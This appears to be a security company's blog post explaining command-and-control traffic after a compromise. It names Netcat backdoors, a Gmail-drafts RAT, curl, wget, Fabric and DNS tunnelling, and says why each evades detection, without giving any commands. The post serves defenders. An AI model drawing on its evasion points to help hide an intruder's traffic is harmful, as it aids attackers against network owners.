It seems everyone should be looking for Command and Control traffic from inside the network
(updated on 04/01/2016)
What does Command and Control mean?
It is the last process in the hacking cycle:
As we have pointed out:
SVAPE & C Scan, Vulnerability Analysis, Penetrate Exploit & Control
from other posts http://www.fixvirus.com/svapec/
Our video: http://youtu.be/51V3-pGcAzE
Picture:
Of course we are talking after the computer has been taken over (no matter how).
So now the hacker wants to control the device, how will that occur? There has to be communication back to a machine that can respond and let the thief know another machine is ready for commands.
C in the picture is equal to “Command & Control”
Many programs can be used to achieve The Control goal for the thief.
Of course the thief can create their own programs to connect to their home base, but that would take too much effort, so typically they will use programs that are already available to communicate back and forth.
Programs such as Netcat can do the trick very well.
In fact there is a persistent Netcat backdoor in Metasploit: http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor
The key in the Netcat Control procedure requires Netcat to be uploaded to the machine, of course this is why netcat is blacklisted in many antivirus software.
Netcat allows a method where commands can be entered from another machine but run on the target system.
Other pros for Netcat: can use any port number to send messages (makes it hard to figure out on a network control system what this traffic actually is)
So let’s say somehow Netcat is not working –
What else can be used?
How about Gmail drafts?
As in this article: http://www.networkworld.com/article/2840559/microsoft-subnet/stealthy-malware-uses-gmail-drafts-as-command-and-control-to-steal-data.html
Also known as a RAT – Remote Administration Tool
Notice here that the communication is executed by Internet explorer (which is on all Microsoft windows machines).
Here are more pros for the thief:
- Analysis by reverse engineering is more complicated – there’s no obvious evidence of malicious network behavior or socket usage, etc.
- The user does not usually notice the additional communication being carried out by the browser – the session is hidden.
that means port numbers are hidden since they use the standard browser traffic.
The ShapeSecurity researcher could not recommend how to find this data and here is the final sentence:
{Before the malware morphed, however, and based on G Data’s analysis, it could work “just as well for numerous web portals such as Gmail, Outlook.com, etc. Even LinkedIn, Facebook and other social networks could be misused in this way.”}
So this method has more pros, the con is that the thief has to be good at Python , but that is not a barrier to entry for the thief.
You can use Curl if it is a Linux machine (that is just a command and located on all Linux systems)
Or other commands on Linux can be used such as wget.
How about commands on Windows that can run on any Windows computers.
What about Fabric? a Python remote execution program. http://www.fabfile.org/ the con for this is Python module and also must get its way onto the target machine. also is only on a Unixlike machines.
The pro is it uses a ssh an encrypted protocol.
there are many Command and Control methods for thief hackers to use and to circumvent your detection methods.
(Added for 04/01/2016)
For 2016 – how about the Holiday hack Challenge by SANS? https://holidayhackchallenge.com/
Why evaluate a ctf (capture the flag) event? Because the writeup for the best writeup is a good explanation of how hackers can penetrate your network.
(using DNS traffic) so the hacker if can stay under radar and you will not know the attack. As the files being transferred back in your network are .jpg files which may actually have messages included.
How can we prevent C&C traffic? Very difficult.
Contact Us to review your options
1 thought on “Command & Control Traffic From Inside Network”